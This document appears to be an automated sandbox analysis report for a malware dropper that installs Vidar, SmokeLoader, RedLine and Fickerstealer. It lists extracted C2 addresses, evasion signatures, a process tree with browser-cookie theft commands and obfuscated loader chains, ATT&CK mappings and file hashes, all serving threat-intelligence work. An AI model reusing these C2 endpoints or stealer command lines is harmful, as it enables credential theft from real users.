Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    47s
  • max time network
    353s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    20-07-2021 18:05

General

  • Target

    8 (19).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

fickerstealer

C2

37.0.8.225:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

vidar

Version

39.7

Botnet

828

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    828

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 3 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:884
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:792
    • C:\Users\Admin\AppData\Local\Temp\8 (19).exe
      "C:\Users\Admin\AppData\Local\Temp\8 (19).exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\setup_install.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1800
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_1.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:512
            • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\sonia_1.exe
              sonia_1.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1720
              • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\sonia_1.exe
                "C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\sonia_1.exe" -a
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1636
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_3.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1088
            • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\sonia_3.exe
              sonia_3.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies system certificate store
              PID:824
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 716
                6⤵
                • Program crash
                PID:2260
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_2.exe
            4⤵
            • Loads dropped DLL
            PID:1848
            • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\sonia_2.exe
              sonia_2.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:876
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_5.exe
            4⤵
            • Loads dropped DLL
            PID:680
            • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\sonia_5.exe
              sonia_5.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:920
              • C:\Users\Admin\Documents\Awg6At3AzeMu8Zg9MIXPXweQ.exe
                "C:\Users\Admin\Documents\Awg6At3AzeMu8Zg9MIXPXweQ.exe"
                6⤵
                • Executes dropped EXE
                PID:2116
              • C:\Users\Admin\Documents\Q8q5_Iu6tQRtTZprdQnnvoof.exe
                "C:\Users\Admin\Documents\Q8q5_Iu6tQRtTZprdQnnvoof.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2128
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c cmd < Bagnava.xltm
                  7⤵
                    PID:2524
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd
                      8⤵
                        PID:2644
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /V /R "^IPAFDLOJiKVQTxFiLgMiLlaMrCAuVnAKdUxdXbtsjyJWSQEpztbDlGmbvNCwlINIlkmYZfphlcUGAvUjYsMQqXmJxXUpUru$" Sia.xltm
                          9⤵
                            PID:2668
                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                            Sensitive.exe.com p
                            9⤵
                              PID:2808
                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com p
                                10⤵
                                  PID:3024
                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com
                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sensitive.exe.com p
                                    11⤵
                                      PID:1988
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 127.0.0.1 -n 30
                                  9⤵
                                  • Runs ping.exe
                                  PID:2828
                          • C:\Users\Admin\Documents\rJE9ZnugLuPq6JQG7b6jLh1r.exe
                            "C:\Users\Admin\Documents\rJE9ZnugLuPq6JQG7b6jLh1r.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2148
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                              7⤵
                                PID:1912
                                • C:\Windows\SysWOW64\explorer.exe
                                  explorer https://iplogger.org/2LBCU6
                                  8⤵
                                    PID:840
                                  • C:\Windows\SysWOW64\regedit.exe
                                    regedit /s adj.reg
                                    8⤵
                                    • Runs .reg file with regedit
                                    PID:776
                                  • C:\Windows\SysWOW64\regedit.exe
                                    regedit /s adj2.reg
                                    8⤵
                                    • Runs .reg file with regedit
                                    PID:1856
                                • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                                  "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                                  7⤵
                                    PID:2484
                                • C:\Users\Admin\Documents\FPGd7lVgeuWO70ytEhwZIoCP.exe
                                  "C:\Users\Admin\Documents\FPGd7lVgeuWO70ytEhwZIoCP.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:2188
                                • C:\Users\Admin\Documents\q1xSlj7AXBSla3lsHfd6EsKF.exe
                                  "C:\Users\Admin\Documents\q1xSlj7AXBSla3lsHfd6EsKF.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Modifies system certificate store
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2180
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c taskkill /f /im chrome.exe
                                    7⤵
                                      PID:2484
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        8⤵
                                        • Kills process with taskkill
                                        PID:1912
                                  • C:\Users\Admin\Documents\f2IUg7X0fG14m0rjbmSW_s4E.exe
                                    "C:\Users\Admin\Documents\f2IUg7X0fG14m0rjbmSW_s4E.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2168
                                    • C:\Users\Admin\Documents\f2IUg7X0fG14m0rjbmSW_s4E.exe
                                      C:\Users\Admin\Documents\f2IUg7X0fG14m0rjbmSW_s4E.exe
                                      7⤵
                                        PID:2844
                                    • C:\Users\Admin\Documents\Oe2GaHcEXlWKdxZGXhExCVwH.exe
                                      "C:\Users\Admin\Documents\Oe2GaHcEXlWKdxZGXhExCVwH.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2236
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                          PID:1596
                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          7⤵
                                            PID:2916
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            7⤵
                                              PID:2460
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              7⤵
                                                PID:2644
                                            • C:\Users\Admin\Documents\1td3Sr4rtHbWZJDt2vdar72v.exe
                                              "C:\Users\Admin\Documents\1td3Sr4rtHbWZJDt2vdar72v.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:2252
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                7⤵
                                                  PID:2608
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd
                                                    8⤵
                                                      PID:2688
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                        9⤵
                                                          PID:2744
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                          Acre.exe.com k
                                                          9⤵
                                                            PID:2840
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                              10⤵
                                                                PID:3012
                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                  11⤵
                                                                    PID:548
                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                      12⤵
                                                                        PID:2700
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com
                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.com k
                                                                          13⤵
                                                                          • Loads dropped DLL
                                                                          • Modifies system certificate store
                                                                          PID:920
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 127.0.0.1 -n 30
                                                                  9⤵
                                                                  • Runs ping.exe
                                                                  PID:2876
                                                          • C:\Users\Admin\Documents\6D2_li_y2FqEJ4J3iei1btIt.exe
                                                            "C:\Users\Admin\Documents\6D2_li_y2FqEJ4J3iei1btIt.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:2272
                                                          • C:\Users\Admin\Documents\j0hIt3ZnSoYH3nugW7iyA3zi.exe
                                                            "C:\Users\Admin\Documents\j0hIt3ZnSoYH3nugW7iyA3zi.exe"
                                                            6⤵
                                                              PID:2728
                                                              • C:\Users\Admin\AppData\Roaming\3302618.exe
                                                                "C:\Users\Admin\AppData\Roaming\3302618.exe"
                                                                7⤵
                                                                  PID:1476
                                                                • C:\Users\Admin\AppData\Roaming\1529813.exe
                                                                  "C:\Users\Admin\AppData\Roaming\1529813.exe"
                                                                  7⤵
                                                                    PID:2008
                                                                • C:\Users\Admin\Documents\ItIj6_VQuSVHREAmekyQ56fv.exe
                                                                  "C:\Users\Admin\Documents\ItIj6_VQuSVHREAmekyQ56fv.exe"
                                                                  6⤵
                                                                    PID:3000
                                                                  • C:\Users\Admin\Documents\37nmf2QhaJ4rp5y3KWDoqsgf.exe
                                                                    "C:\Users\Admin\Documents\37nmf2QhaJ4rp5y3KWDoqsgf.exe"
                                                                    6⤵
                                                                      PID:3040
                                                                      • C:\Users\Admin\Documents\37nmf2QhaJ4rp5y3KWDoqsgf.exe
                                                                        C:\Users\Admin\Documents\37nmf2QhaJ4rp5y3KWDoqsgf.exe
                                                                        7⤵
                                                                          PID:1960
                                                                        • C:\Users\Admin\Documents\37nmf2QhaJ4rp5y3KWDoqsgf.exe
                                                                          C:\Users\Admin\Documents\37nmf2QhaJ4rp5y3KWDoqsgf.exe
                                                                          7⤵
                                                                            PID:1992
                                                                        • C:\Users\Admin\Documents\WS6_T03BTSIY0UdoI8YV3SMj.exe
                                                                          "C:\Users\Admin\Documents\WS6_T03BTSIY0UdoI8YV3SMj.exe"
                                                                          6⤵
                                                                            PID:3056
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 876
                                                                              7⤵
                                                                              • Program crash
                                                                              PID:2916
                                                                          • C:\Users\Admin\Documents\d6mosPBj_0ZDPSX6BrZXoVTw.exe
                                                                            "C:\Users\Admin\Documents\d6mosPBj_0ZDPSX6BrZXoVTw.exe"
                                                                            6⤵
                                                                              PID:2292
                                                                              • C:\Users\Admin\Documents\d6mosPBj_0ZDPSX6BrZXoVTw.exe
                                                                                C:\Users\Admin\Documents\d6mosPBj_0ZDPSX6BrZXoVTw.exe
                                                                                7⤵
                                                                                  PID:1760
                                                                              • C:\Users\Admin\Documents\kwB5J2MkuYuq4fu23fGYJ61_.exe
                                                                                "C:\Users\Admin\Documents\kwB5J2MkuYuq4fu23fGYJ61_.exe"
                                                                                6⤵
                                                                                  PID:2056
                                                                                • C:\Users\Admin\Documents\KxDIWSn8O6R5iIdCkkgP1oG2.exe
                                                                                  "C:\Users\Admin\Documents\KxDIWSn8O6R5iIdCkkgP1oG2.exe"
                                                                                  6⤵
                                                                                    PID:1220
                                                                                    • C:\Users\Admin\Documents\KxDIWSn8O6R5iIdCkkgP1oG2.exe
                                                                                      "C:\Users\Admin\Documents\KxDIWSn8O6R5iIdCkkgP1oG2.exe"
                                                                                      7⤵
                                                                                        PID:3008
                                                                                    • C:\Users\Admin\Documents\ru0fqQjJs5hq0iBvmEvfBkfR.exe
                                                                                      "C:\Users\Admin\Documents\ru0fqQjJs5hq0iBvmEvfBkfR.exe"
                                                                                      6⤵
                                                                                        PID:1424
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 276
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:2500
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                    4⤵
                                                                                      PID:1752
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:676
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\sonia_6.exe
                                                                                        sonia_6.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Adds Run key to start application
                                                                                        • Modifies system certificate store
                                                                                        PID:1936
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:1908
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:2216
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:432
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\sonia_4.exe
                                                                                sonia_4.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies system certificate store
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1612
                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                  2⤵
                                                                                    PID:2856
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                      3⤵
                                                                                        PID:1556
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          4⤵
                                                                                            PID:3020
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            4⤵
                                                                                              PID:2600
                                                                                          • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                                                                            3⤵
                                                                                              PID:2296
                                                                                              • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                                                                                4⤵
                                                                                                  PID:1220
                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                                                                                3⤵
                                                                                                  PID:836
                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                  3⤵
                                                                                                    PID:1628
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                                                                                    3⤵
                                                                                                      PID:2536
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                                                                                      3⤵
                                                                                                        PID:2292
                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                          C:\Windows\system32\WerFault.exe -u -p 2292 -s 672
                                                                                                          4⤵
                                                                                                          • Program crash
                                                                                                          PID:2208
                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                    1⤵
                                                                                                    • Process spawned unexpected child process
                                                                                                    PID:840
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                      2⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1164
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                    1⤵
                                                                                                      PID:2316
                                                                                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2LBCU6
                                                                                                        2⤵
                                                                                                          PID:2040
                                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2040 CREDAT:275457 /prefetch:2
                                                                                                            3⤵
                                                                                                              PID:2644
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FCE5.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\FCE5.exe
                                                                                                          1⤵
                                                                                                            PID:2172

                                                                                                          Network

                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                          Persistence

                                                                                                          Modify Existing Service

                                                                                                          1
                                                                                                          T1031

                                                                                                          Registry Run Keys / Startup Folder

                                                                                                          1
                                                                                                          T1060

                                                                                                          Defense Evasion

                                                                                                          Modify Registry

                                                                                                          3
                                                                                                          T1112

                                                                                                          Disabling Security Tools

                                                                                                          1
                                                                                                          T1089

                                                                                                          Virtualization/Sandbox Evasion

                                                                                                          1
                                                                                                          T1497

                                                                                                          Install Root Certificate

                                                                                                          1
                                                                                                          T1130

                                                                                                          Discovery

                                                                                                          Query Registry

                                                                                                          4
                                                                                                          T1012

                                                                                                          Virtualization/Sandbox Evasion

                                                                                                          1
                                                                                                          T1497

                                                                                                          System Information Discovery

                                                                                                          5
                                                                                                          T1082

                                                                                                          Peripheral Device Discovery

                                                                                                          1
                                                                                                          T1120

                                                                                                          Remote System Discovery

                                                                                                          1
                                                                                                          T1018

                                                                                                          Command and Control

                                                                                                          Web Service

                                                                                                          1
                                                                                                          T1102

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\libcurl.dll
                                                                                                            MD5

                                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                                            SHA1

                                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                            SHA256

                                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                            SHA512

                                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\libcurlpp.dll
                                                                                                            MD5

                                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                                            SHA1

                                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                            SHA256

                                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                            SHA512

                                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\libgcc_s_dw2-1.dll
                                                                                                            MD5

                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                            SHA1

                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                            SHA256

                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                            SHA512

                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\libstdc++-6.dll
                                                                                                            MD5

                                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                                            SHA1

                                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                            SHA256

                                                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                            SHA512

                                                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\libwinpthread-1.dll
                                                                                                            MD5

                                                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                                                            SHA1

                                                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                            SHA256

                                                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                            SHA512

                                                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\setup_install.exe
                                                                                                            MD5

                                                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                            SHA1

                                                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                            SHA256

                                                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                            SHA512

                                                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS874D2AF4\setup_install.exe
                                                                                                            MD5

                                                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                            SHA1

                                                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                            SHA256

